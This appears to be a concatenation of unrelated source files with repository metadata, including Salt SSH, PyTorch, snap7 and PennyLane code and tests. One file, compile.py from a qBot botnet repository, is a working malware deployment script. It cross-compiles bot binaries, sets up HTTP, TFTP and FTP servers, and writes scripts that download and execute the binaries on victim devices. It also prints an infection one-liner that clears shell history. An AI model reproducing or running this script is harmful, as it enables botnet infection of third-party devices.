salt '*' ssh.user_keys user=user1 prvfile=False
salt '*' ssh.user_keys user="['user1','user2'] pubfile=id_rsa.pub prvfile=id_rsa
As you can see you can tell Salt not to read from the user's private (or public) key file by setting the
file path to ``False``. This can be useful to prevent Salt from publishing private data via Salt Mine or
others.
'''
if not user:
user = __salt__['user.list_users']()
if not isinstance(user, list):
# only one so convert to list
user = [user]
keys = {}
for u in user:
keys[u] = {}
userinfo = __salt__['user.info'](u)
if 'home' not in userinfo:
# no home directory, skip
continue
userKeys = []
if pubfile:
userKeys.append(pubfile)
elif pubfile is not False:
# Add the default public keys
userKeys += ['id_rsa.pub', 'id_dsa.pub', 'id_ecdsa.pub', 'id_ed25519.pub']
if prvfile:
userKeys.append(prvfile)
elif prvfile is not False:
# Add the default private keys
userKeys += ['id_rsa', 'id_dsa', 'id_ecdsa', 'id_ed25519']
for key in userKeys:
if key.startswith('/'):
keyname = os.path.basename(key)
fn_ = key
else:
# if not full path, assume key is in .ssh
# in user's home directory
keyname = key
fn_ = '{0}/.ssh/{1}'.format(userinfo['home'], key)
if os.path.exists(fn_):
try:
with salt.utils.fopen(fn_, 'r') as _fh:
keys[u][keyname] = ''.join(_fh.readlines())
except (IOError, OSError):
pass
# clean up any empty items
_keys = {}
for key in keys:
if keys[key]:
_keys[key] = keys[key]
return _keys
@decorators.which('ssh-keygen')
def hash_known_hosts(user=None, config=None):
'''
Hash all the hostnames in the known hosts file.
.. versionadded:: 2014.7.0
user
hash known hosts of this user
config
path to known hosts file: can be absolute or relative to user's home
directory
CLI Example:
.. code-block:: bash
salt '*' ssh.hash_known_hosts
'''
full = _get_known_hosts_file(config=config, user=user)
if isinstance(full, dict):
return full # full contains error information
if not os.path.isfile(full):
return {'status': 'error',
'error': 'Known hosts file {0} does not exist'.format(full)}
cmd = ['ssh-keygen', '-H', '-f', full]
cmd_result = __salt__['cmd.run'](cmd, python_shell=False)
# ssh-keygen creates a new file, thus a chown is required.
if os.geteuid() == 0 and user:
uinfo = __salt__['user.info'](user)
os.chown(full, uinfo['uid'], uinfo['gid'])
return {'status': 'updated', 'comment': cmd_result}
def _hostname_and_port_to_ssh_hostname(hostname, port=DEFAULT_SSH_PORT):
if not port or port == DEFAULT_SSH_PORT:
return hostname
else:
return '[{0}]:{1}'.format(hostname, port)
| 31.535921 | 109 | 0.56177 |
4306426a804a389616a5919b964ad80081e71ea5 | 4,771 | py | Python | src/classifier/routing.py | chengemily/Distributional-Signatures | 7ef96f9cfc8aeb2fb54e117e3968e4390aaad819 | [
"MIT"
] | 243 | 2019-08-15T18:34:09.000Z | 2022-03-31T11:51:00.000Z | src/classifier/routing.py | phymucs/460d60d2c25a118c67dcbfdd37f27d6c | cd7e4659fc9761a8af046e824853aa338b22f2f6 | [
"MIT"
] | 34 | 2019-10-22T08:11:28.000Z | 2022-03-19T08:03:30.000Z | src/classifier/routing.py | phymucs/460d60d2c25a118c67dcbfdd37f27d6c | cd7e4659fc9761a8af046e824853aa338b22f2f6 | [
"MIT"
] | 54 | 2019-08-19T16:11:49.000Z | 2022-03-31T05:36:01.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from classifier.base import BASE
class ROUTING(BASE):
'''
Induction and Relation module of
"Induction Networks for Few-Shot Text Classification"
'''
def __init__(self, ebd_dim, args):
super(ROUTING, self).__init__(args)
self.args = args
self.ebd_dim = ebd_dim
h = args.induct_hidden_dim
self.iter = args.induct_iter
if self.args.embedding == 'meta':
print('No relation module. Use Prototypical network style prediction')
else: # follow the original paper
self.Ws = nn.Linear(self.ebd_dim, self.ebd_dim)
self.M = nn.Parameter(torch.Tensor(h, 1, 1, self.ebd_dim, self.ebd_dim).uniform_(-0.1,0.1))
self.rel = nn.Linear(h, 1)
def _squash(self, X):
'''
Perform squashing over the last dimension
The dimension remain the same
'''
X_norm = torch.norm(X, dim=-1, keepdim=True)
out = (X_norm ** 2) / (1.0 + X_norm ** 2) / X_norm * X
return out
def _compute_prototype(self, XS, YS):
'''
Compute the prototype for each class by dynamic routing
@param XS (support x): support_size x ebd_dim
@param YS (support y): support_size
@return prototype: way x ebd_dim
'''
# sort YS to make sure classes of the same labels are clustered together
YS, indices = torch.sort(YS)
XS = XS[indices]
# squash
if self.args.embedding == 'meta':
# do not transform the matrix to preserve information when
# distributional signatures are used
XS_hat = self._squash(XS)
else:
# original paper's transformation
XS_hat = self._squash(self.Ws(XS))
b = torch.zeros([self.args.way, self.args.shot], device=XS.device)
prototype = []
for it in range(self.iter):
# perform dynamic routing for each class
d = F.softmax(b, dim=-1)
new_b = torch.zeros_like(b)
for i in range(self.args.way):
# examples belonging to class i
XS_hat_cur = XS_hat[i*self.args.shot:(i+1)*self.args.shot,:]
# generate prototypes
c_hat = torch.sum(d[i, :].unsqueeze(1) * XS_hat_cur, dim=0)
c = self._squash(c_hat)
# update b
new_b[i,:] = b[i,:] + (XS_hat_cur @ c.unsqueeze(1)).squeeze(1)
if it == self.iter-1:
prototype.append(c.unsqueeze(0))
b = new_b
prototype = torch.cat(prototype, dim=0)
return prototype
def _compute_relation_score(self, prototype, XQ):
'''
Compute the relation score between each prototype and each query
example
@param prototype: way x ebd_dim
@param XQ: query_size x ebd_dim
@return score: query_size x way
'''
prototype = prototype.unsqueeze(0).unsqueeze(0).unsqueeze(-2)
# 1, 1, way, 1, ebd_dim
XQ = XQ.unsqueeze(1).unsqueeze(-1).unsqueeze(0)
# 1, query_size, 1, ebd_dim, 1
score = torch.matmul(torch.matmul(prototype, self.M),
XQ)
# h, query_size, way, 1, 1
score = score.squeeze(-1).squeeze(-1).permute(1, 2, 0)
# query_size, way, h
score = F.relu(score)
score = torch.sigmoid(self.rel(score)).squeeze(-1)
return score
def forward(self, XS, YS, XQ, YQ):
'''
@param XS (support x): support_size x ebd_dim
@param YS (support y): support_size
@param XQ (support x): query_size x ebd_dim
@param YQ (support y): query_size
@return acc
@return loss
'''
YS, YQ = self.reidx_y(YS, YQ)
prototype = self._compute_prototype(XS, YS)
if self.args.embedding == 'meta':
# use parameter free comparison when distributional signatures are
# used
score = -self._compute_l2(prototype, XQ)
# score = -self._compute_cos(prototype, XQ)
# l2 and cos deosn't have much diff empirically across the 6
# datasets
loss = F.cross_entropy(score, YQ)
else:
# implementation based on the original paper
score = self._compute_relation_score(prototype, XQ)
# use regression as training objective
YQ_onehot = self._label2onehot(YQ)
loss = torch.sum((YQ_onehot.float() - score) ** 2)
acc = BASE.compute_acc(score, YQ)
return acc, loss
| 31.388158 | 103 | 0.559002 |
40964542fdb6760c522e5bebdab2ee6d89f2fa67 | 6,372 | py | Python | compile.py | yassineas/Dream-qBot-Botnet-Source | d76d92776b1995655ef85eba216f5fdffc114b29 | [
"MIT"
] | 14 | 2020-12-22T01:38:02.000Z | 2022-02-08T15:59:39.000Z | compile.py | yassineas/Dream-qBot-Botnet-Source | d76d92776b1995655ef85eba216f5fdffc114b29 | [
"MIT"
] | 2 | 2021-03-02T23:46:05.000Z | 2022-03-16T10:20:48.000Z | compile.py | yassineas/Dream-qBot-Botnet-Source | d76d92776b1995655ef85eba216f5fdffc114b29 | [
"MIT"
] | 8 | 2020-10-08T02:16:19.000Z | 2021-12-31T09:25:30.000Z | import subprocess, sys
if len(sys.argv[2]) != 0:
ip = sys.argv[2]
else:
print("\x1b[0;31mIncorrect Usage!")
print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m")
exit(1)
bot = sys.argv[1]
SNOOPY= raw_input("Y/n Get Arch-")
if SNOOPY.lower() == "y":
get_arch = True
else:
get_arch = False
compileas = ["m-i.p-s.ISIS" ,
"m-p.s-l.ISIS" ,
"s-h.4-.ISIS",
"x-8.6-.ISIS",
"a-r.m-6.ISIS",
"x-3.2-.ISIS",
"a-r.m-7.ISIS",
"p-p.c-.ISIS",
"i-5.8-6.ISIS",
"m-6.8-k.ISIS",
"p-p.c-.ISIS",
"a-r.m-4.ISIS" ,
"a-r.m-5.ISIS"]
getarch = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2',
'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2',
'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2',
'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2']
ccs = ["cross-compiler-mips",
"cross-compiler-mipsel",
"cross-compiler-sh4",
"cross-compiler-x86_64",
"cross-compiler-armv6l",
"cross-compiler-i686",
"cross-compiler-powerpc",
"cross-compiler-i586",
"cross-compiler-m68k",
"cross-compiler-armv7l",
"cross-compiler-armv4l",
"cross-compiler-armv4l",
"cross-compiler-armv5l"]
def run(cmd):
subprocess.call(cmd, shell=True)
run("rm -rf /var/www/html/* /var/lib/tftpboot/* /var/ftp/*")
if get_arch == True:
run("rm -rf cross-compiler-*")
print("Downloading Architectures")
for arch in getarch:
run("wget " + arch + " --no-check-certificate >> /dev/null")
run("tar -xvf *tar.bz2")
run("rm -rf *tar.bz2")
print("Cross Compilers Downloaded...")
num = 0
for cc in ccs:
arch = cc.split("-")[2]
run("./"+cc+"/bin/"+arch+"-gcc -static -pthread -D" + arch.upper() + " -o " + compileas[num] + " " + bot + " > /dev/null")
num += 1
print("Cross Compiling Done!")
print("Setting up your httpd and tftp")
run("yum install httpd -y")
run("service httpd start")
run("yum install xinetd tftp tftp-server -y")
run("yum install vsftpd -y")
run("service vsftpd start")
run('''echo -e "# default: off
# description: The tftp server serves files using the trivial file transfer \
# protocol. The tftp protocol is often used to boot diskless \
# workstations, download configuration files to network-aware printers, \
# and to start the installation process for some operating systems.
service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
server_args = -s -c /var/lib/tftpboot
disable = no
per_source = 11
cps = 100 2
flags = IPv4
}
" > /etc/xinetd.d/tftp''')
run("service xinetd start")
run('''echo -e "listen=YES
local_enable=NO
anonymous_enable=YES
write_enable=NO
anon_root=/var/ftp
anon_max_rate=2048000
xferlog_enable=YES
listen_address='''+ ip +'''
listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''')
run("service vsftpd restart")
for i in compileas:
run("cp " + i + " /var/www/html")
run("cp " + i + " /var/ftp")
run("mv " + i + " /var/lib/tftpboot")
run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp1.sh')
run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp1.sh')
run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp1.sh')
run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp2.sh')
run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp2.sh')
run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp2.sh')
run('echo -e "#!/bin/bash" > /var/www/html/ISIS.sh')
for i in compileas:
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/' + i + '; chmod +x ' + i + '; ./' + i + '; rm -rf ' + i + '" >> /var/www/html/ISIS.sh')
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' ' + i + ' ' + i + '; chmod 777 ' + i + ' ./' + i + '; rm -rf ' + i + '" >> /var/ftp/ftp1.sh')
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get ' + i + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp1.sh')
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ' + i + ' -g ' + ip + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp2.sh')
run("service xinetd restart")
run("service httpd restart")
run('echo -e "ulimit -n 99999" >> ~/.bashrc')
#USE IF YOU WANT TO print("\x1b[0mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/SnOoPy.sh; chmod 777 SnOoPy.sh; sh SnOoPy.sh; tftp " + ip + " -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g " + ip + "; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf SnOoPy.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\x1b[0m")
print("\x1b[1;33mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g " + ip + " -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c")
print("\x1b[1;31m ISIS BOTNET CODED BY KOMODO FOR HIS SON SHY")
print("\x1b[1;32m After you copied your link type 'ls' okay you got that? it is 'LS' but lowercase") | 42.198675 | 444 | 0.566384 |
d91931efc1a8dc9e9617eb6fe7838e2b5b31012c | 1,275 | py | Python | deritradeterminal/threads/orders/LimitBuyThread.py | mrhelloyellow/deri-trade-terminal | a882ac4ae01924a06faf1b92ebe3bfe7110d2105 | [
"MIT"
] | null | null | null | deritradeterminal/threads/orders/LimitBuyThread.py | mrhelloyellow/deri-trade-terminal | a882ac4ae01924a06faf1b92ebe3bfe7110d2105 | [
"MIT"
] | null | null | null | deritradeterminal/threads/orders/LimitBuyThread.py | mrhelloyellow/deri-trade-terminal | a882ac4ae01924a06faf1b92ebe3bfe7110d2105 | [
"MIT"
] | null | null | null | from PyQt5 import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from deritradeterminal.util.deribit_api import RestClient
from deritradeterminal.managers.ConfigManager import ConfigManager
class LimitBuyThread(QThread):
signeler = pyqtSignal(bool,str,str)
def processOrder(self):
try:
config = ConfigManager.get_config()
client = RestClient(config.tradeApis[self.accountid][0], config.tradeApis[self.accountid][1], ConfigManager.get_config().apiUrl)
client.buy(ConfigManager.get_config().tradeInsturment, float(self.amount), float(self.price), "limit")
self.signeler.emit(True, "Limit Order Success", "Limit Buy On Account: " + str(self.accountid) + " For Amount: " + str(self.amount) + " At Price: " + str(self.price))
except Exception as e:
self.signeler.emit(False, "Limit Buy Order Error" , "Failed to limit buy on " + str(self.accountid) + " for amount: " + str(self.amount) + "\n" + str(e))
def __init__(self, accountid, price , amount):
QThread.__init__(self)
self.accountid = accountid
self.price = price
self.amount = amount
def run(self):
self.processOrder()
| 36.428571 | 178 | 0.661176 |
a79fb2ea1f73f4d7ba3ff4c225204eedff7c7463 | 718 | py | Python | tests/test_helpers.py | michael-karotsieris/taggsy | 94bd0522963f699c5b3b94d9c7d25d447d75d148 | [
"MIT"
] | null | null | null | tests/test_helpers.py | michael-karotsieris/taggsy | 94bd0522963f699c5b3b94d9c7d25d447d75d148 | [
"MIT"
] | null | null | null | tests/test_helpers.py | michael-karotsieris/taggsy | 94bd0522963f699c5b3b94d9c7d25d447d75d148 | [
"MIT"
] | null | null | null | from unittest import TestCase
from .context import taggsy
class TestFilterStopwords(TestCase):
def test_filters_out_stopwords(self):
'''
Test that stopwords are filtered out
'''
word_list = ['this', 'is', 'are']
filtered_list = taggsy.helpers.filter_stopwords(words=word_list)
self.assertEqual(filtered_list, [])
def test_does_not_filter_out_non_stopwords(self):
'''
Test that non-stopwords are not filtered out
'''
word_list = ['word', 'clarity']
filtered_list = taggsy.helpers.filter_stopwords(words=word_list)
self.assertEqual(filtered_list, word_list)
if __name__ == "__main__":
unittest.main()
| 26.592593 | 72 | 0.657382 |
96a01725d974a4f5863d067df7dc10ea9a6673ad | 229 | py | Python | Task/Averages-Median/Python/averages-median.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Averages-Median/Python/averages-median.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/Averages-Median/Python/averages-median.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z | def median(aray):
srtd = sorted(aray)
alen = len(srtd)
return 0.5*( srtd[(alen-1)//2] + srtd[alen//2])
a = (4.1, 5.6, 7.2, 1.7, 9.3, 4.4, 3.2)
print a, median(a)
a = (4.1, 7.2, 1.7, 9.3, 4.4, 3.2)
print a, median(a)
| 22.9 | 51 | 0.519651 |
886599ad0d84c0ce611ddced49e4889dff31a7ea | 3,530 | py | Python | test/test_partner.py | SimplyAutomationized/python-snap7 | 966127a712754a543eeb4a5d71d52be7a80811f9 | [
"MIT"
] | 8 | 2016-01-08T21:11:05.000Z | 2019-08-03T02:52:30.000Z | test/test_partner.py | SimplyAutomationized/python-snap7 | 966127a712754a543eeb4a5d71d52be7a80811f9 | [
"MIT"
] | null | null | null | test/test_partner.py | SimplyAutomationized/python-snap7 | 966127a712754a543eeb4a5d71d52be7a80811f9 | [
"MIT"
] | 3 | 2016-01-31T18:43:33.000Z | 2020-02-04T14:08:52.000Z | import logging
import unittest as unittest
import snap7.partner
from snap7.snap7exceptions import Snap7Exception
logging.basicConfig(level=logging.WARNING)
class TestPartner(unittest.TestCase):
def setUp(self):
self.partner = snap7.partner.Partner()
self.partner.start()
def test_as_b_send(self):
self.partner.as_b_send()
@unittest.skip("we don't recv something yet")
def test_b_recv(self):
self.partner.b_recv()
def test_b_send(self):
self.partner.b_send()
def test_check_as_b_recv_completion(self):
self.partner.check_as_b_recv_completion()
def test_check_as_b_send_completion(self):
self.partner.check_as_b_send_completion()
def test_create(self):
self.partner.create()
def test_destroy(self):
self.partner.destroy()
def test_error_text(self):
snap7.common.error_text(0, context="partner")
def test_get_last_error(self):
self.partner.get_last_error()
def test_get_param(self):
expected = (
(snap7.snap7types.LocalPort, 0),
(snap7.snap7types.RemotePort, 102),
(snap7.snap7types.PingTimeout, 750),
(snap7.snap7types.SendTimeout, 10),
(snap7.snap7types.RecvTimeout, 3000),
(snap7.snap7types.SrcRef, 256),
(snap7.snap7types.DstRef, 0),
(snap7.snap7types.SrcTSap, 0),
(snap7.snap7types.PDURequest, 480),
(snap7.snap7types.WorkInterval, 100),
(snap7.snap7types.BSendTimeout, 3000),
(snap7.snap7types.BRecvTimeout, 3000),
(snap7.snap7types.RecoveryTime, 500),
(snap7.snap7types.KeepAliveTime, 5000),
)
for param, value in expected:
self.assertEqual(self.partner.get_param(param), value)
self.assertRaises(Exception, self.partner.get_param,
snap7.snap7types.MaxClients)
def test_get_stats(self):
self.partner.get_stats()
def test_get_status(self):
self.partner.get_status()
def test_get_times(self):
self.partner.get_times()
def test_set_param(self):
values = (
(snap7.snap7types.PingTimeout, 800),
(snap7.snap7types.SendTimeout, 15),
(snap7.snap7types.RecvTimeout, 3500),
(snap7.snap7types.WorkInterval, 50),
(snap7.snap7types.SrcRef, 128),
(snap7.snap7types.DstRef, 128),
(snap7.snap7types.SrcTSap, 128),
(snap7.snap7types.PDURequest, 470),
(snap7.snap7types.BSendTimeout, 2000),
(snap7.snap7types.BRecvTimeout, 2000),
(snap7.snap7types.RecoveryTime, 400),
(snap7.snap7types.KeepAliveTime, 4000),
)
for param, value in values:
self.partner.set_param(param, value)
self.assertRaises(Exception, self.partner.set_param,
snap7.snap7types.RemotePort, 1)
def test_set_recv_callback(self):
self.partner.set_recv_callback()
def test_set_send_callback(self):
self.partner.set_send_callback()
def test_start(self):
self.partner.start()
def test_start_to(self):
self.partner.start_to('0.0.0.0', '0.0.0.0', 0, 0)
def test_stop(self):
self.partner.stop()
def test_wait_as_b_send_completion(self):
self.assertRaises(Snap7Exception, self.partner.wait_as_b_send_completion)
if __name__ == '__main__':
unittest.main()
| 30.17094 | 81 | 0.633144 |
9a2077225534ddcaded39bba9108c9b10ed9519f | 25,916 | py | Python | tests/test_tf.py | InduManimaran/pennylane | 375d25acc7bd2e6d5243b5273958b26513c33189 | [
"Apache-2.0"
] | 2 | 2021-06-29T01:30:08.000Z | 2021-08-23T10:38:52.000Z | tests/test_tf.py | InduManimaran/pennylane | 375d25acc7bd2e6d5243b5273958b26513c33189 | [
"Apache-2.0"
] | null | null | null | tests/test_tf.py | InduManimaran/pennylane | 375d25acc7bd2e6d5243b5273958b26513c33189 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for the :mod:`pennylane.interface.tf` QNode interface.
"""
import pytest
import numpy as np
try:
import tensorflow as tf
if tf.__version__[0] == "1":
import tensorflow.contrib.eager as tfe
tf.enable_eager_execution()
Variable = tfe.Variable
else:
from tensorflow import Variable
except ImportError as e:
pass
import pennylane as qml
from pennylane.qnode import _flatten, unflatten, QNode, QuantumFunctionError
from pennylane.plugins.default_qubit import CNOT, Rotx, Roty, Rotz, I, Y, Z
from pennylane._device import DeviceError
def expZ(state):
return np.abs(state[0]) ** 2 - np.abs(state[1]) ** 2
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestTFQNodeExceptions():
"""TFQNode basic tests."""
def test_qnode_fails_on_wrong_return_type(self, qubit_device_2_wires):
"""The qfunc must return only Expectations"""
@qml.qnode(qubit_device_2_wires, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
return qml.expval(qml.PauliZ(0)), 0.3
with pytest.raises(QuantumFunctionError, match='must return either'):
qf(Variable(0.5))
def test_qnode_fails_on_expval_not_returned(self, qubit_device_2_wires):
"""All expectation values in the qfunc must be returned"""
@qml.qnode(qubit_device_2_wires, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
ex = qml.expval(qml.PauliZ(1))
return qml.expval(qml.PauliZ(0))
with pytest.raises(QuantumFunctionError, match='All measured observables'):
qf(Variable(0.5))
def test_qnode_fails_on_wrong_expval_order(self, qubit_device_2_wires):
"""Expvals must be returned in the order they were created in"""
@qml.qnode(qubit_device_2_wires, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
ex = qml.expval(qml.PauliZ(1))
return qml.expval(qml.PauliZ(0)), ex
with pytest.raises(QuantumFunctionError, match='All measured observables'):
qf(Variable(0.5))
def test_qnode_fails_on_gates_after_measurements(self, qubit_device_2_wires):
"""Gates have to precede measurements"""
@qml.qnode(qubit_device_2_wires, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
ev = qml.expval(qml.PauliZ(1))
qml.RY(0.5, wires=[0])
return ev
with pytest.raises(QuantumFunctionError, match='gates must precede'):
qf(Variable(0.5))
def test_qnode_fails_on_multiple_measurements_of_same_wire(self, qubit_device_2_wires):
"""A wire can only be measured once"""
@qml.qnode(qubit_device_2_wires, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1)), qml.expval(qml.PauliX(0))
with pytest.raises(QuantumFunctionError, match='can only be measured once'):
qf(Variable(0.5))
def test_qnode_fails_on_qfunc_with_too_many_wires(self, qubit_device_2_wires):
"""The device must have sufficient wires for the qfunc"""
@qml.qnode(qubit_device_2_wires, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
qml.CNOT(wires=[0, 2])
return qml.expval(qml.PauliZ(0))
with pytest.raises(QuantumFunctionError, match='applied to invalid wire'):
qf(Variable(0.5))
def test_qnode_fails_on_combination_of_cv_and_qbit_ops(self, qubit_device_1_wire):
"""CV and discrete operations must not be mixed"""
@qml.qnode(qubit_device_1_wire, interface='tf')
def qf(x):
qml.RX(x, wires=[0])
qml.Displacement(0.5, 0, wires=[0])
return qml.expval(qml.PauliZ(0))
with pytest.raises(QuantumFunctionError, match='Continuous and discrete'):
qf(Variable(0.5))
def test_qnode_fails_for_cv_ops_on_qubit_device(self, qubit_device_1_wire):
"""A qubit device cannot execute CV operations"""
@qml.qnode(qubit_device_1_wire, interface='tf')
def qf(x):
qml.Displacement(0.5, 0, wires=[0])
return qml.expval(qml.X(0))
with pytest.raises(DeviceError, match='Gate [a-zA-Z]+ not supported on device'):
qf(Variable(0.5))
def test_qnode_fails_for_cv_observables_on_qubit_device(self, qubit_device_1_wire):
"""A qubit device cannot measure CV observables"""
@qml.qnode(qubit_device_1_wire, interface='tf')
def qf(x):
return qml.expval(qml.X(0))
with pytest.raises(DeviceError, match='Observable [a-zA-Z]+ not supported on device'):
qf(Variable(0.5))
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestTFQNodeParameterHandling:
"""Test that the TFQNode properly handles the parameters of qfuncs"""
def test_qnode_fanout(self, qubit_device_1_wire, tol):
"""Tests that qnodes can compute the correct function when the same parameter is used in multiple gates."""
@qml.qnode(qubit_device_1_wire, interface='tf')
def circuit(reused_param, other_param):
qml.RX(reused_param, wires=[0])
qml.RZ(other_param, wires=[0])
qml.RX(reused_param, wires=[0])
return qml.expval(qml.PauliZ(0))
thetas = tf.linspace(-2*np.pi, 2*np.pi, 7)
for reused_param in thetas:
for theta in thetas:
other_param = theta ** 2 / 11
y_eval = circuit(reused_param, other_param)
Rx = Rotx(reused_param.numpy())
Rz = Rotz(other_param.numpy())
zero_state = np.array([1.,0.])
final_state = (Rx @ Rz @ Rx @ zero_state)
y_true = expZ(final_state)
assert np.allclose(y_eval, y_true, atol=tol, rtol=0)
def test_qnode_array_parameters_scalar_return(self, qubit_device_1_wire, tol):
"""Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow.
Test case for a circuit that returns a scalar."""
# The objective of this test is not to check if the results are correctly calculated,
# but to check that the interoperability of the different return types works.
@qml.qnode(qubit_device_1_wire, interface='tf')
def circuit(dummy1, array, dummy2):
qml.RY(0.5 * array[0,1], wires=0)
qml.RY(-0.5 * array[1,1], wires=0)
return qml.expval(qml.PauliX(0)) # returns a scalar
grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4))
cost_target = 1.03257
args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13))
def cost(x, array, y):
c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32)
return c +0.5*array[0,0] +x -0.4*y
with tf.GradientTape() as tape:
cost_res = cost(*args)
grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])])
assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0)
assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0)
def test_qnode_array_parameters_1_vector_return(self, qubit_device_1_wire, tol):
"""Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow
Test case for a circuit that returns a 1-vector."""
# The objective of this test is not to check if the results are correctly calculated,
# but to check that the interoperability of the different return types works.
@qml.qnode(qubit_device_1_wire, interface='tf')
def circuit(dummy1, array, dummy2):
qml.RY(0.5 * array[0,1], wires=0)
qml.RY(-0.5 * array[1,1], wires=0)
return qml.expval(qml.PauliX(0)), # note the comma, returns a 1-vector
grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4))
cost_target = 1.03257
args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13))
def cost(x, array, y):
c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32)
c = c[0] # get a scalar
return c +0.5*array[0,0] +x -0.4*y
with tf.GradientTape() as tape:
cost_res = cost(*args)
grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])])
assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0)
assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0)
def test_qnode_array_parameters_2_vector_return(self, qubit_device_2_wires, tol):
"""Test that QNode can take arrays as input arguments, and that they interact properly with TensorFlow
Test case for a circuit that returns a 2-vector."""
# The objective of this test is not to check if the results are correctly calculated,
# but to check that the interoperability of the different return types works.
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(dummy1, array, dummy2):
qml.RY(0.5 * array[0,1], wires=0)
qml.RY(-0.5 * array[1,1], wires=0)
qml.RY(array[1,0], wires=1)
return qml.expval(qml.PauliX(0)), qml.expval(qml.PauliX(1)) # returns a 2-vector
grad_target = (np.array(1.), np.array([[0.5, 0.43879, 0], [0, -0.43879, 0]]), np.array(-0.4))
cost_target = 1.03257
args = (Variable(0.46), Variable([[2., 3., 0.3], [7., 4., 2.1]]), Variable(-0.13))
def cost(x, array, y):
c = tf.cast(circuit(tf.constant(0.111), array, tf.constant(4.5)), tf.float32)
